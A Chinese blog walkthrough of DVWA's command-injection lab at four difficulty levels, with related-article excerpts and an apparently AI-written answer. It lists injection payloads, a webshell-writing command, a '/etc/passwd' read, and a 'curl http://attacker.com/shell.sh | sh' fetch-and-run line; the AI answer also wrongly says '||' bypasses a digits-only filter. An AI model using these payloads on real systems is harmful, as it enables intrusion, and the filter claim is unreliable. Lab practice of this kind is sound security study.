DVWA通关之命令注入(command injection)

最新推荐文章于 2025-03-06 14:32:08 发布
最新推荐文章于 2025-03-06 14:32:08 发布
阅读量745 收藏 11
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试 # 靶机实战 文章标签: 渗透测试 command php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/RuoLi_s/article/details/113348047
本文详细介绍了DVWA中的命令注入漏洞,从低到高四个难度等级的过关思路,并分析了不同等级下的源代码,揭示了过滤机制的不足。文章强调了命令执行漏洞的类型和相关系统函数,提醒开发者注意命令注入的安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DVWA通关之命令注入(command injection)

原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14340551.html

难度等级:low

过关思路

  1. 我们先将其难度设置为low,看到其界面如下:

image-20210128141119846

  1. 通过分析得知,该功能是输入一个IP地址,然后通过ping进行测试,先输入127.0.0.1www.baidu.com测试如下:

127.0.0.1

image-20210128141414768

www.baidu.com

image-20210128141609752

  1. 可以看到,IP地址和域名都是能够ping通的,接下来就是使用命令拼接测试了,

输入127.0.0.1 | whoami

image-20210128142225176

命令注入成功。

  1. 命令汇总,经过测试,以下命令均可注入成功。

127.0.0.1|whoami

127.0.0.1&whoami

127.0.0.1000 || whoami

127.0.0.1 && whoami

  1. 注意:有空格和无空格有时会有意想不到的效果

  2. 做完了当然得看一下源码:

image-20210128143009680

  可以看到,该代码没有对用户的输入做任何的过滤,直接使用shell_exec函数执行用户输入,这是非常危险的。

难度等级:medium

过关思路

  1. 这里过关思路和low一致,也没啥可说的,我们主要看一下源码就行。
  2. 源代码如下:

image-20210128143630947

  通过分析,可以看出,medium关卡比low关卡多了一个黑名单。其通过数组的方式将&&;进行了过滤,即将其替换为。但是,这种过滤基本上还是跟没有过滤差不多,因为黑名单里的过滤太少了,黑名单也不安全。

难度等级:high

过关思路

  1. 上手先测试几个前面的payload,发下好多都被过滤了,但是还有几个可以用:

127.0.0.1 || whoami

127.0.0.1|whoami

127.0.0.1000||whoami

image-20210128154801468

  1. 我们直接看源代码:

image-20210128154709468

  可以看到,这次的黑名单过滤明显的多了起来,但是也发现(可能是故意给我们漏出来的😂),其在过滤的时候,没有过滤|而是过滤了|+空格,所以,该代码只是遇到单单一个|,不会进行过滤。

难度等级:impossible

过关思路

  1. 这关基本上是不存在安全风险的,之所以放在这里,当作一个关卡,应该也是为了让我们学习一下怎么进行过滤,我们还是直接看源代码吧。
  2. 源代码如下:

                

                
                
        

    

    
  


        

            

                      
                        最低0.47元/天 解锁文章
                        

                          
200万优质内容无限畅学

                          
                        

                      
            

        


    



                



	

		

			

				
					
DVWA命令注入Command Injection

				
			

			

				

					弱弱的小雨鸟
				

				

					01-21
					
					1万+
					
				

			

		

		

			
				
命令注入Command Injection),是指在某些需要输入数据的位置,还构造了恶意的代码破坏了原先的语句结构。而系统缺少有效的过滤,最终达到破坏数据、信息泄露甚至掌控电脑的目的。许多内容管理系统CMS存在命令注入漏洞。
 
解决乱码问题
在文本框中输入”ip address”后结果显示为乱码,如下图所示。
 
解决此问题的方法:在DVWA-master\dvwa\includes

			
		

	



                

            
              



	

		

			

				
					
DVWA通关攻略之命令注入

				
			

			

				

					勿山几已
				

				

					05-06
					
					2607
					
				

			

		

		

			
				
简要介绍命令注入漏洞,演示手工和burp爆破挖掘命令注入漏洞/RCE

			
		

	



              


  
              

                


	

		

			

				
					
DVWA--Command Injection

				
			

			

				

					weixin_56440174的博客
				

				

					06-14
					
					1540
					
				

			

		

		

			
				
命令注入是利用系统弱点获取对系统的访问权限,以执行恶意代码、获取用户数据和参与其他活动。命令注入常用的参数有&&、&、|、||、;、%0a(换行符的URL编码)1.;
各命令的执行给果,不会影响其它命令的执行。换句话说,各个命令都会执行,但不保证每个命令都执行成功。
2.&&
若前面的命令执行成功,才会去执行后面的命令。这样可以保证所有的命令执行完毕后,执行过程都是成功的。
3.||
||是或的意思,只有前面的命令执行失败后才去执行下一条命令,直到执行成功一条命令为止。
4.|
|是管道符号。管道符号改

			
		

	





	

		

			

				
					
dvwa命令注入

				
			

			

				

					weixin_33781606的博客
				

				

					11-28
					
					472
					
				

			

		

		

			
				
  在只需要数据的地方恶意插入了命令,而系统没有过滤时会造成命令注入dvwa提供了练习的地方

  正常情况下这是用来测试网址能否连接

  1.Security:Low
  然鹅当我们插入恶意命令127.0.0.1&&net user

  
  查看源代码:

<?php

if( isset( $_POST[ 'Submit' ]  ) )...

			
		

	



		

			
		



	

		

			

				
					
DVWA-命令注入Command Injection

				
			

			

				

					qyy970525的博客
				

				

					11-20
					
					537
					
				

			

		

		

			
				
DVWA-命令注入Command InjectionCommand InjectionLow相关函数介绍漏洞利用Medium漏洞利用1.127.0.0.1 & ls&&和&的区别127.0.0.1 &;& lsHigh漏洞利用127.0.0.1 |lsImpossible
Command Injection
Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PH

			
		

	





	

		

			

				
					
dvwa命令注入

				
			

			

				

					qq_44159634的博客
				

				

					12-12
					
					2482
					
				

			

		

		

			
				
dvwa命令注入命令行执行时过滤不完全时会导致命令注入
常用连接符
&&与&:前后命令都执行
|:执行后面的命令,前面命令不执行
low:

输入一个ip,可以看出是ping一下ip
payload:127.0.0.1 | ls -an


medium

过滤了&&,&和|都没有过滤

high

看别人的wp后,发现"| "有个空格。。。所以直接把空格去了就行了

命令注入绕过方式
https://blog.youkuaiyun.com/weixin_395

			
		

	





	

		

			

				
					
DVWA通关--命令注入command injection

				
			

			

				

					箭雨镜屋
				

				

					12-13
					
					2831
					
				

			

		

		

			
				
low

通关步骤

1、输入127.0.0.1试一下有没有回显



有的

2、输入127.0.0.1 | whoami



命令注入成功

3、尝试写入木马

payload:127.0.0.1 | echo "<?php assert($_POST[ele]);?>" > e1.php

这边注意,我试了echo后面的内容不加引号,或者加单引号,都没有文件生成。网上找到的echo的资料中也都是双引号。



submit之后无回显



4、服务器上看当前关卡目录下有文件e1.p

			
		

	





	

		

			

				
					
dvwa靶场:Command Injection系列】【命令执行】Command Injection低-中-高级别通关

				
			

			

				

					m0_47484034的博客
				

				

					11-25
					
					283
					
				

			

		

		

			
				
dvwa靶场:Command Injection系列】【命令执行】Command Injection低-中-高级别通关

			
		

	





	

		

			

				
					
DVWACommand Injection通关(低中高)

				
			

			

				

					LIU6636LIU的博客
				

				

					07-13
					
					568
					
				

			

		

		

			
				
DVWACommand Injection通关(低中高)

			
		

	





	

		

			

				
					
DVWA-命令注入

				
			

			

				

					weixin_51513059的博客
				

				

					11-01
					
					5952
					
				

			

		

		

			
				
DVWA-命令注入通关
命令注入相関概念及命令注入的防御

			
		

	





	

		

			

				
					
DVWA靶场——Command Injection

				
			

			

				

					 sucker的博客
				

				

					11-25
					
					2247
					
				

			

		

		

			
				
从Web安全角度来看,尽管这段代码通过一定的机制(如 CSRF token)来防止一些常见的攻击,但它仍然存在严重的安全问题,特别是命令注入漏洞。这是一个好的做法,能防止 CSRF 攻击。由于 $target 是由用户提供的输入,且没有对其进行充分的过滤或转义,攻击者可以通过在 IP 地址中注入恶意命令来执行任意操作。PHP 代码的主要功能是根据用户提交的 IP 地址执行 ping 命令根据操作系统的不同(Windows 或 Unix 类系统)生成相应的 ping 命令,然后将命令输出返回给用户。

			
		

	





	

		

			

				
					
DVWACommand Injection命令注入通关教程

				
			

			

				

					weixin_30527551的博客
				

				

					08-01
					
					740
					
				

			

		

		

			
				
日期:2019-08-01 16:05:34
更新:
作者:Bay0net
介绍:利用命令注入,来复习了一下绕过过滤的方法,还可以写一个字典来 fuzz 命令注入的点。




0x01、 漏洞介绍

仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载数据的系统对此未设计良好的过滤过程,导致恶意代码也一执行,最终导致信息泄露或者正常数据的破坏。

用户的一切输入都是...

			
		

	





	

		

			

				
					
DVWA 靶场通关Command Injection命令注入

				
			

			

				

					weixin_40433003的博客
				

				

					03-06
					
					951
					
				

			

		

		

			
				
是一个用于学习 Web 安全漏洞的靶场,其中关卡主要考察如何在服务器执行命令注入攻击。本文将介绍三个等级的通关方法。

			
		

	





	

		

			

				
					
网络安全 DVWA通关指南 DVWA Command Injection命令注入

				
			

			

				

					YueXuan_521的博客
				

				

					07-28
					
					797
					
				

			

		

		

			
				
网络安全 DVWA通关指南 DVWA Command Injection命令注入)
网页对参数没有任何过滤,可以使用"&“、”&&“、”|“、”||"逻辑连接符连接命令,直接执行命令。2、真没想到黑名单字符数组中,'| ''的后面多了一个空格,所以还是可以使用"|"连接符进行连接。2、网页将"&&"连接符过滤了,可以使用其他的逻辑连接符,命令注入成功。连接符左右是否有空格没有影响。注意逻辑连接符的区别。

			
		

	





	

		

			

				
					
DVWA靶场通关Command injection

				
			

			

				

					m0_56010012的博客
				

				

					03-10
					
					891
					
				

			

		

		

			
				
命令注入Command Injection),是指在某些需要输入数据的位置,还构造了恶意的代码破坏了原先的语句结构。而系统缺少有效的过滤,最终达到破坏数据、信息泄露甚至掌控电脑的目的。许多内容管理系统CMS存在命令注入漏洞。

命令执行定义:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。

形成原因:脚本语言优点是简洁,方便,

			
		

	





	

		

			

				
					
命令注入--DVMA

				
			

			

				

					weixin_74406445的博客
				

				

					09-08
					
					1141
					
				

			

		

		

			
				
程序员使用脚本语言开发应用程序的过程中,有时需要调用一些执行系统命令的函数,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

			
		

	





	

		

			

				
					
DVWA--Command injection命令注入

				
			

			

				

					weixin_50342860的博客
				

				

					08-19
					
					483
					
				

			

		

		

			
				
目录风险lowmediumhigh修复
风险
对一些函数的参数没有进行严格的过滤,利用函数中的参数,将恶意的命令拼接到正常的命令当中,使之返回一些敏感信息。
命令连接符
command1 && command2    先执行command1后执行command2
command1 | command2        只执行command2
command1 & command2      先执行command2后执行command1
以上三种连接符在windows和linux环境下都

			
		

	





	

		

			

				
					
DVWA--Command Injection(命令执行)--四个等级

				
			

			

				

					1stPeak's Blog
				

				

					10-29
					
					4849
					
				

			

		

		

			
				
Command Injection,也就是我们常说的命令执行,DVWA共有四个等级
索引目录
  Low  
  Medium  
  High  
  Impossible  

    Low  
 源代码:  
<?php 

if( isset( $_POST[ 'Submit' ]  ) ) { 
    // Check Anti-CSRF token 
    checkTok...

			
		

	





	

		

			

				
					
DVWA 靶场之 Command Injection命令执行)原理介绍、分隔符测试、后门写入与源码分析、修复建议

				
			

			

				

					Welcome To Myon'Blog !
				

				

					02-26
					
					8307
					
				

			

		

		

			
				
代替 localhost :在操作系统的配置文件中,通常将 localhost(本地主机名)与 127.0.0.1 绑定在一起,这样在应用程序中使用 localhost 时,实际上是在使用本地回环地址,用于访问本机上运行的网络服务和应用程序。在操作系统中,“ &、|、&&、|| ” 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。:对服务器和应用程序进行安全配置,关闭不必要的服务和功能,限制可执行命令的范围。

			
		

	





	

		

			

				
					
dvwa靶场Command Injectionmin命令注入

					
最新发布

				
			

			

				

					04-02
				

			

		

		

			
				
<think>嗯,用户想了解DVWA靶场中的Command Injection漏洞测试和利用方法,需要详细步骤和示例。首先,我得回忆一下DVWA的基本设置,尤其是命令注入的模块。用户可能已经知道DVWA是什么,但可能需要先登录到Low安全级别开始测试。

首先,命令注入通常发生在用户输入被拼接到系统命令中执行的情况下。在DVWACommand Injection模块,用户输入一个IP地址,然后系统执行ping命令。这时候,如果输入没有经过严格的过滤,攻击者可以注入额外的命令。

比如,在Low安全级别下,后端代码可能直接拼接用户输入的参数到ping命令中,而没有做任何过滤。这时候用户输入类似`127.0.0.1; ls`,分号后面的命令就会被执行。这时候需要给出具体的示例,比如如何利用不同的符号如`&&`、`|`或者`&`来注入命令。

接下来,不同安全级别的防护措施不同。比如Medium级别可能过滤了一些符号,但可能没有完全覆盖,这时候需要测试哪些符号被转义或过滤了。比如,可能过滤了`;`和`&&`,但`|`可能仍然可用,或者需要尝试其他绕过方法,比如用`%0a`(换行符)来分隔命令。

High级别的防护可能更严格,可能只允许特定的输入格式,比如限制输入为IP地址格式。这时候可能需要利用IP地址的格式特性,比如使用`127.0.0.1 || ls`,如果代码检查IP格式是否合法,但后面的命令仍然会被执行的话。或者,使用反引号执行命令,如`$(ls)`。

Impossible级别可能使用了白名单或其他彻底防护的方法,这时候基本无法注入,需要说明其防护机制,比如使用escapeshellarg函数处理参数。

在漏洞利用示例中,要分级别展示不同的注入方式,说明如何通过Burp Suite这样的工具拦截请求,修改参数,或者直接在输入框中输入注入命令。还要注意不同操作系统下的命令差异,比如Windows和Linux的符号可能不同,但DVWA通常运行在Linux环境下。

另外,生成的相关问题需要考虑用户可能进一步想知道如何防御命令注入,或者DVWA其他漏洞模块的测试方法,比如SQL注入或XSS。还要注意提醒用户只在合法授权的环境下进行测试,避免法律问题。

现在需要确保回答结构清晰,步骤正确,示例准确,且引用格式正确。要检查是否有遗漏的安全级别或常见绕过方法,比如使用反斜杠转义或者编码绕过过滤。同时,要确保给出的代码示例正确,比如PHP中可能存在漏洞的代码部分,以及防护措施如参数化执行或输入验证。</think># DVWA Command Injection漏洞测试与利用方法

## 一、漏洞原理
命令注入漏洞产生于未正确过滤用户输入的情况下,攻击者通过拼接系统命令实现任意命令执行。DVWACommand Injection模块模拟了`ping`功能,其基础命令为:
$$ ping -c 4 {user_input} $$
当用户输入包含`;`、`&&`、`|`等命令分隔符时,可注入额外命令[^1]。

## 二、安全测试步骤(分安全等级)

### 1. Low安全级别
**测试方法**:
```http
POST /vulnerabilities/exec/ HTTP/1.1
Host: localhost
...
ip=127.0.0.1;whoami&Submit=Submit
```
**注入示例**:
- `127.0.0.1; ls /` 列出根目录
- `127.0.0.1 && cat /etc/passwd` 查看系统账户

### 2. Medium安全级别
**过滤机制**:
```php
$target = str_replace(';', '', $target); // 移除分号
```
**绕过方法**:
```http
ip=127.0.0.1%0aid && ping -c 4 127.0.0.1
```
使用换行符`%0a`或未过滤的`&`符号

### 3. High安全级别
**防护代码**:
```php
if( preg_match( '/^[0-9.]+$/i', $target ) ) // 限制数字和点号
```
**绕过示例**:
```bash
127.0.0.1 || ls -al
```
利用逻辑运算符绕过正则检测

### 4. Impossible级别
**防护措施**:
```php
$target = escapeshellarg($target); // 参数化处理
$cmd = shell_exec('ping -c 4 '.$target);
```
此时无法进行命令注入

## 三、漏洞利用演示
**Burp Suite拦截修改**:
```http
POST /vulnerabilities/exec/ HTTP/1.1
...
ip=127.0.0.1;curl+http://attacker.com/shell.sh+|+sh
```
该payload将下载执行远程脚本

## 四、防御方案
1. 使用`exec($command, $output)`替代直接命令拼接
2. 实施白名单验证:
```php
if (!preg_match('/^[0-9.]+$/', $ip)) {
    die("Invalid IP format");
}
```
3. 参数化处理:
```php
$clean_ip = escapeshellarg($_POST['ip']);
```

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值